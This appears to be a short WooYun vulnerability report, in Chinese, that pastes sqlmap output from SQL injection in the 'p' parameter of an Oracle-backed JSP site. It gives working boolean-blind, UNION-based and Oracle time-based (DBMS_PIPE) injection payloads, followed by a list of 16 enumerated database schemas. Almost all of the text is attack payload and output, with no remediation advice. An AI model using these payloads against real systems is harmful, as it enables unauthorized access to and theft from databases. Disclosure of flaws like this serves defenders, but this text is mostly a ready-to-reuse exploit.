WooYun.org

老规矩，上sqlmap：
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: GET
Parameter: p
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=G%' AND 1585=1585 AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: p=G%' UNION ALL SELECT NULL,CHR(113)||CHR(106)||CHR(116)||CHR(100)||CHR(113)||CHR(78)||CHR(100)||CHR(97)||CHR(72)||CHR(114)||CHR(115)||CHR(73)||CHR(90)||CHR(117)||CHR(98)||CHR(113)||CHR(97)||CHR(110)||CHR(109)||CHR(113) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: p=G%' AND 8845=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(80)||CHR(82)||CHR(97),5) AND '%'='
---
[17:21:24] [INFO] the back-end DBMS is Oracle
web application technology: Apache 2.2.22, JSP
back-end DBMS: Oracle
[17:21:24] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[17:21:24] [INFO] fetching database (schema) names
available databases [16]:
[*] CREWLW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
其他懒得折腾了。。